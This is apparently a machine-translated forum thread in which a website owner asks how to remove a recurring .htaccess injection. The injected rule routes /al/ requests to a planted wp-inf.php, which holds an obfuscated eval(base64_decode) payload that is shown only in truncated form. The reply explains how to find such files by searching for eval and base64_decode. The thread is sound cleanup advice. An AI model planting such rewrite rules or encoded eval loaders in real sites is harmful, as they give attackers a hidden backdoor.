我有一个用codeigniter构建的网站,去年我安装了wordpress来创建博客。但从3周前开始,当我试图访问我的管理网站并出现代码点火器404错误时,问题就开始了。所以我意识到问题出在.htaccess上,不知何故是由什么东西写的。我认为是wordpress,我删除了添加的代码,一切都很好,但再次编写了htaccess,所以我删除了包含所有wordpress文件的博客文件夹,问题再次出现,然后我从数据库中删除了wp_tables,但问题仍然存在。已经编写的代码是:
# BEGIN SYSTEM API
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^al/(.*)$ myfolder/wp-inf.php?$1 [L]
# END SYSTEM API
我搜索了wp-inf.php文件,发现了这样的东西:
<? eval(base64_decode("ICAgIGVycm9yX3JlcG9ydGluZygwKTsgICRscnUgPSAiZ2c.....")); ?>
我不知道该怎么办,也不知道在哪里可以找到一直在写htaccess的文件。我一直在清理和删除一些文件,但什么都没有。
希望你能帮我。谢谢
编辑时间:******如果我解码base64_decode中的内容,则显示为:
error_reporting(0); $lru = "gg/4623696-260514551155404-520n89823525745/765s127r625o9
(edited)
}echo $result; exit; }
创建一个新服务器并传输数据不会有帮助,因为这是编写htaccess的文件,而不是访问问题。你要做的是在所有文件中搜索"base64_decode"answers"eval",看看这些文件是wordpress中的默认文件,还是为了混淆而创建和命名的。例如,wordpress默认情况下没有名为wp-inf.php的文件。这两个函数用于恶意目的的次数占90%。
- Base64_decode用于解码任何编码的字符串,使其难以读取和搜索(混淆)
- Eval用于执行提供给它的任何php代码
你可以使用这个解码器来解码实际的代码,看看目的是什么。https://www.base64decode.org/
另一种方法是将文件夹结构与原始wordpress结构进行比较。
为了避免将来出现这种情况,尽量不要使用任何为空的主题或插件